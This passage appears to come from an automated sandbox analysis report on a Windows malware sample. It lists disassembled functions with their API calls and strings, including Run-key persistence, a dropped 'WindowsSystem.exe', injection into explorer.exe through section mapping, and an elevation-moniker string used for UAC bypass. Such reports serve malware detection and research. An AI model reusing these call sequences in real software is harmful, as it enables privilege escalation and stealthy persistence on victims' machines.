                                                                                                              • Part of subcall function 00320870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003208D3
                                                                                                              • Part of subcall function 00320870: WSACloseEvent.WS2_32(00000000), ref: 003208E0
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 0031F78A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateEventsInfoLocaleMultipleSelectWait___crt
                                                                                                            • String ID:
                                                                                                            • API String ID: 3201519519-0
                                                                                                            • Opcode ID: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                                                                                                            • Instruction ID: a1ef313da2e57933ad43376648b66e34cb17749965216cbcf1b148c43451c55f
                                                                                                            • Opcode Fuzzy Hash: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                                                                                                            • Instruction Fuzzy Hash: AF21DBB5D0020AEFDB09DF98C884AEEB7B5FF48304F108699E825A7385D7349A51CF90
                                                                                                            Function 0032A950 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002A90E), ref: 0032A955
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 566e694ae996613ac02ba6169d2c4881af4960925bd87e60b028d0e99ae06628
                                                                                                            • Instruction ID: 4963852871ca242c607ca48d4c918a3e0473654f2d6a00c4bc8fe6fe6c7d9179
                                                                                                            • Opcode Fuzzy Hash: 566e694ae996613ac02ba6169d2c4881af4960925bd87e60b028d0e99ae06628
                                                                                                            • Instruction Fuzzy Hash: 0C9002B16A155C5B460217717D4D54626985B48756F530491A101C4254DB9080C1A912
                                                                                                            Function 003158B0 Relevance: 112.5, APIs: 47, Strings: 17, Instructions: 478stringregistrylibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • wnsprintfW.SHLWAPI ref: 00315A98
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 00315AB4
                                                                                                            • wnsprintfW.SHLWAPI ref: 00315AE4
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 00315B00
                                                                                                            • wnsprintfW.SHLWAPI ref: 00315B30
                                                                                                              • Part of subcall function 003179F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 00315B4C
                                                                                                            • wnsprintfW.SHLWAPI ref: 00315B7C
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 00315B98
                                                                                                              • Part of subcall function 00312680: RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 0031269B
                                                                                                              • Part of subcall function 00312680: RegDeleteValueW.ADVAPI32(?,00376FC8,?,?,00301109), ref: 003126AE
                                                                                                              • Part of subcall function 00312680: RegCloseKey.ADVAPI32(?,?,?,00301109), ref: 003126B8
                                                                                                              • Part of subcall function 00312680: RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 003126D5
                                                                                                              • Part of subcall function 00312680: RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,00301109), ref: 003126E8
                                                                                                              • Part of subcall function 00312680: RegCloseKey.ADVAPI32(?,?,?,00301109), ref: 003126F2
                                                                                                              • Part of subcall function 00313160: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,00315BA8), ref: 0031317A
                                                                                                              • Part of subcall function 00313160: SHGetKnownFolderPath.SHELL32(00337BF0,00000000,00000000,?), ref: 00313196
                                                                                                              • Part of subcall function 00313160: __snwprintf.LIBCMT ref: 003131B7
                                                                                                              • Part of subcall function 00313160: DeleteFileW.KERNEL32(00000000), ref: 003131C3
                                                                                                              • Part of subcall function 00313160: CoTaskMemFree.COMBASE(?), ref: 003131CD
                                                                                                              • Part of subcall function 00313160: LocalFree.KERNEL32(00000000), ref: 003131D7
                                                                                                              • Part of subcall function 00313160: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 003131EA
                                                                                                              • Part of subcall function 00313160: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003131FF
                                                                                                              • Part of subcall function 00313160: __snwprintf.LIBCMT ref: 00313229
                                                                                                              • Part of subcall function 00313160: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313238
                                                                                                              • Part of subcall function 00313160: __snwprintf.LIBCMT ref: 00313263
                                                                                                              • Part of subcall function 00313160: DeleteFileW.KERNEL32(00000000), ref: 0031326F
                                                                                                              • Part of subcall function 00313160: RemoveDirectoryW.KERNEL32(00000000), ref: 00313279
                                                                                                              • Part of subcall function 00313160: LocalFree.KERNEL32(00000000), ref: 00313283
                                                                                                              • Part of subcall function 00313160: LocalFree.KERNEL32(00000000), ref: 0031328D
                                                                                                              • Part of subcall function 00313160: CoTaskMemFree.COMBASE(?), ref: 00313297
                                                                                                              • Part of subcall function 00312F20: OpenEventW.KERNEL32(00100002,00000000,{B189748B-D39F-48B3-A389-0325B737C49A}), ref: 00312F3F
                                                                                                              • Part of subcall function 00312F20: SetEvent.KERNEL32(00000000), ref: 00312F5B
                                                                                                              • Part of subcall function 00312F20: CloseHandle.KERNEL32(00000000), ref: 00312F68
                                                                                                              • Part of subcall function 00312F20: OpenMutexW.KERNEL32(00100000,00000000,{37C6EA19-2C19-41BB-90A5-BF73BD18C9D4}), ref: 00312F84
                                                                                                              • Part of subcall function 00312F20: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00312FA2
                                                                                                              • Part of subcall function 00312F20: CloseHandle.KERNEL32(00000000), ref: 00312FAF
                                                                                                              • Part of subcall function 00312F20: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 00312FC5
                                                                                                              • Part of subcall function 00312F20: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00312FDA
                                                                                                              • Part of subcall function 00312F20: __snwprintf.LIBCMT ref: 0031301F
                                                                                                              • Part of subcall function 00312F20: lstrlenW.KERNEL32(00000000), ref: 0031302E
                                                                                                              • Part of subcall function 00312F20: _memset.LIBCMT ref: 0031306A
                                                                                                              • Part of subcall function 00312F20: GetFileAttributesW.KERNEL32(00000000), ref: 003130A5
                                                                                                              • Part of subcall function 00312F20: LocalFree.KERNEL32(00000000), ref: 003130F1
                                                                                                              • Part of subcall function 00312F20: CoTaskMemFree.COMBASE(?), ref: 003130FE
                                                                                                              • Part of subcall function 00312E00: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00315BB2,?,?,?,?,?,?,?,?,?,?,?,00315BB2), ref: 00312E13
                                                                                                              • Part of subcall function 00312E00: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,00315BB2), ref: 00312E28
                                                                                                              • Part of subcall function 00312E00: __snwprintf.LIBCMT ref: 00312E61
                                                                                                              • Part of subcall function 00312E00: lstrlenW.KERNEL32(00000000), ref: 00312E6D
                                                                                                              • Part of subcall function 00312E00: _memset.LIBCMT ref: 00312E97
                                                                                                              • Part of subcall function 00312E00: GetFileAttributesW.KERNEL32(00000000), ref: 00312EC0
                                                                                                              • Part of subcall function 00312E00: LocalFree.KERNEL32(00000000), ref: 00312EFD
                                                                                                              • Part of subcall function 00312E00: CoTaskMemFree.COMBASE(00315BB2), ref: 00312F07
                                                                                                              • Part of subcall function 00312AB0: CoInitializeEx.COMBASE(00000000,00000000), ref: 00312AE0
                                                                                                              • Part of subcall function 00312AB0: CoUninitialize.COMBASE ref: 00312DDD
                                                                                                              • Part of subcall function 00310010: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00316B10,00371178,00316B10), ref: 00310023
                                                                                                              • Part of subcall function 00310010: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00310034
                                                                                                              • Part of subcall function 00310010: wnsprintfW.SHLWAPI ref: 0031005F
                                                                                                              • Part of subcall function 00310010: lstrlenW.KERNEL32(?), ref: 00310070
                                                                                                              • Part of subcall function 00310010: CoTaskMemFree.COMBASE(?), ref: 0031007F
                                                                                                            • _memset.LIBCMT ref: 00315C2A
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00315C65
                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00315C82
                                                                                                            • LocalFree.KERNEL32(?), ref: 00315CB1
                                                                                                            • _memset.LIBCMT ref: 00315D09
                                                                                                            • __snwprintf.LIBCMT ref: 00315D2E
                                                                                                            • _memset.LIBCMT ref: 00315D4D
                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00315D61
                                                                                                            • _memset.LIBCMT ref: 00315D86
                                                                                                            • __snwprintf.LIBCMT ref: 00315DB1
                                                                                                            • __snwprintf.LIBCMT ref: 00315DD5
                                                                                                            • _memset.LIBCMT ref: 00315DF2
                                                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000044,?), ref: 00315E36
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00315E45
                                                                                                            • DuplicateHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000002), ref: 00315E7D
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00315E8C
                                                                                                            • DuplicateHandle.KERNEL32(?,00000218,?,00000000,00000000,00000001,00000002), ref: 00315EC4
                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00315EDA
                                                                                                            • _memset.LIBCMT ref: 00315EFE
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00315F14
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00315F2E
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00315F48
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315F5C
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315F70
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315F84
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315F98
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315FAC
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315FBD
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00315FD1
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00315FE5
                                                                                                            • LocalFree.KERNEL32(?), ref: 00316079
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031609A
                                                                                                            • CloseHandle.KERNEL32(?), ref: 003160A7
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 003160BF
                                                                                                            • LocalFree.KERNEL32(?), ref: 003160CC
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 003160DE
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003160FA
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316107
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$lstrcpy$Delete__snwprintf_memset$CloseHandle$AllocFile$FolderKnownOpenPathTaskwnsprintf$EventProcesslstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindows
                                                                                                            • String ID: %s%s$0F3$D$LF3$PE3$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$WindowsSystem$WindowsSystem.exe${108D3252-20F0-4C1B-940D-6ED5366D8FD3}${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${D961EA11-3F69-43D1-8581-E526BBBDC738}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}$E3
                                                                                                            • API String ID: 113497637-1625582440
                                                                                                            • Opcode ID: b8929a10b6a63aeefaf4771b5b49711fc1d31b774b6e312869fcead6df622d34
                                                                                                            • Instruction ID: c384fb7a8418518dc66745dd9bf4f710bb74542c208f27b430ec3a0600284972
                                                                                                            • Opcode Fuzzy Hash: b8929a10b6a63aeefaf4771b5b49711fc1d31b774b6e312869fcead6df622d34
                                                                                                            • Instruction Fuzzy Hash: 912219B5D00228ABDB3ADF50DC89FD9B7B8AB49700F0045D9E60DA6181EB756BC8CF51
                                                                                                            Function 00301C80 Relevance: 77.2, APIs: 29, Strings: 15, Instructions: 207stringlibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,{8399C93C-77D8-4A9E-96D7-0200E8B3EE42}), ref: 00301CA2
                                                                                                            • _memset.LIBCMT ref: 00301CCC
                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00301CE0
                                                                                                            • _memset.LIBCMT ref: 00301D05
                                                                                                              • Part of subcall function 0031C1E0: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0030108E), ref: 0031C1EB
                                                                                                              • Part of subcall function 0031C1E0: GetProcAddress.KERNEL32(0030108E,IsWow64Process), ref: 0031C204
                                                                                                            • __snwprintf.LIBCMT ref: 00301D2F
                                                                                                            • __snwprintf.LIBCMT ref: 00301D51
                                                                                                            • _memset.LIBCMT ref: 00301D70
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00301D84
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000DF0), ref: 00301DA3
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00301DC1
                                                                                                            • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00301DD9
                                                                                                            • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00301DF3
                                                                                                            • lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 00301E14
                                                                                                            • lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 00301E2B
                                                                                                            • lstrcpyW.KERNEL32(-00000648,00000000), ref: 00301E42
                                                                                                            • lstrcpyW.KERNEL32(-00000850,{D77DC119-1B4A-41E3-A066-2927413CA76D}), ref: 00301E59
                                                                                                            • lstrcpyW.KERNEL32(-00000A58,?), ref: 00301E73
                                                                                                            • lstrcpyA.KERNEL32(-00000C60,CoGetObject), ref: 00301E8A
                                                                                                            • lstrcpyA.KERNEL32(-00000D28,CoInitialize), ref: 00301EA2
                                                                                                            • lstrcpyA.KERNEL32(-00000D8C,IIDFromString), ref: 00301EBA
                                                                                                            • lstrcpyA.KERNEL32(-00000CC4,ExitProcess), ref: 00301ED1
                                                                                                            • lstrcpyW.KERNEL32(-00000008,{6EDD6D74-C007-4E75-B76A-E5740995E24C}), ref: 00301EE6
                                                                                                            • lstrcpyW.KERNEL32(-00000260,Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00301EFE
                                                                                                              • Part of subcall function 0030A1B0: GetCurrentProcess.KERNEL32 ref: 0030A1B9
                                                                                                              • Part of subcall function 0030A1B0: _memset.LIBCMT ref: 0030A1CA
                                                                                                              • Part of subcall function 0030A1B0: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,00302000), ref: 0030A21B
                                                                                                              • Part of subcall function 0030A1B0: NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 0030A251
                                                                                                              • Part of subcall function 0030A1B0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 0030A285
                                                                                                              • Part of subcall function 0030A1B0: NtMapViewOfSection.NTDLL(00000000,00000000), ref: 0030A290
                                                                                                              • Part of subcall function 0030A1B0: _memmove.LIBCMT ref: 0030A2AF
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00301F78
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00301FA9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00301FB6
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00301FC3
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00301FD9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00301FE9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$Handle$Process_memset$AddressCloseCreateCurrentProc$DirectoryLocalModuleSection__snwprintf$AllocEventFreeObjectSingleTerminateViewWaitWindows_memmove
                                                                                                            • String ID: %s\SysWOW64\explorer.exe$%s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${6EDD6D74-C007-4E75-B76A-E5740995E24C}${8399C93C-77D8-4A9E-96D7-0200E8B3EE42}${D77DC119-1B4A-41E3-A066-2927413CA76D}
                                                                                                            • API String ID: 326014250-2590975238
                                                                                                            • Opcode ID: 2673536bc5174a3722f5775fbcc3f4d83a26dd55324cabb151e5a3d86161bfa5
                                                                                                            • Instruction ID: a2af1000e6d5a8158e7315ab6f9b11075b72bef17386e598917754d79105c620
                                                                                                            • Opcode Fuzzy Hash: 2673536bc5174a3722f5775fbcc3f4d83a26dd55324cabb151e5a3d86161bfa5
                                                                                                            • Instruction Fuzzy Hash: 9B81A0B4941218ABDB35DB60DC89FEA77BAAB88700F0045D8F209A6280DB759AD4CF54
                                                                                                            Function 0030C1F0 Relevance: 68.5, APIs: 29, Strings: 10, Instructions: 241memorystringprocessCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0030C267
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030C2B2
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030C2E6
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030C31C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030C32C
                                                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 0030C353
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030C379
                                                                                                            • lstrcpyW.KERNEL32(00000000,{9D5F29AE-FCE3-40C6-8BE3-47B8C62D31E2}), ref: 0030C39E
                                                                                                            • CoInitializeEx.COMBASE(00000000,00000006), ref: 0030C405
                                                                                                            • ShellExecuteExW.SHELL32(<@@), ref: 0030C418
                                                                                                            • GetLastError.KERNEL32 ref: 0030C424
                                                                                                            • CoUninitialize.COMBASE ref: 0030C439
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030C47A
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030C4B5
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0030C4FC
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030C51D
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030C539
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030C546
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C553
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C560
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030C574
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030C590
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030C59D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C5AA
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C5B7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C5C4
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C5D1
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030C5DD
                                                                                                            • closesocket.WS2_32(?), ref: 0030C5E7
                                                                                                              • Part of subcall function 0030B6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030B701
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B70C
                                                                                                              • Part of subcall function 0030B6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030B724
                                                                                                              • Part of subcall function 0030B6D0: __snwprintf.LIBCMT ref: 0030B74E
                                                                                                              • Part of subcall function 0030B6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B77C
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B7FC
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B806
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AllocEvent$CreateErrorLast$CloseHandleOpenlstrcpywnsprintf$DirectoryExecuteFileInitializeProcessShellUninitialize__snwprintfclosesocketsetsockoptshutdown
                                                                                                            • String ID: "%s%s" %s$%s%s$<@@$@@$D$H53$WindowsSystem.exe${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${9D5F29AE-FCE3-40C6-8BE3-47B8C62D31E2}${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 3249679174-591112596
                                                                                                            • Opcode ID: 61aca38f473fb02afe666feea531d00f59a02081ae7a9064a34c795051403864
                                                                                                            • Instruction ID: 034b3252cec2858f38c4d698ed2a84fae16158468daebab288d6bba520923e68
                                                                                                            • Opcode Fuzzy Hash: 61aca38f473fb02afe666feea531d00f59a02081ae7a9064a34c795051403864
                                                                                                            • Instruction Fuzzy Hash: 45A13AB5910218DFEB36DBA4DC59BADBB78BF48301F0085A9E60DA7290DB745AC4CF50
                                                                                                            Function 003122D0 Relevance: 66.7, APIs: 29, Strings: 9, Instructions: 190memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,00316AFB), ref: 003122DD
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337BF0,00000000,00000000,?), ref: 003122FD
                                                                                                            • __snwprintf.LIBCMT ref: 00312322
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000BB8), ref: 0031234F
                                                                                                            • __snprintf.LIBCMT ref: 0031237E
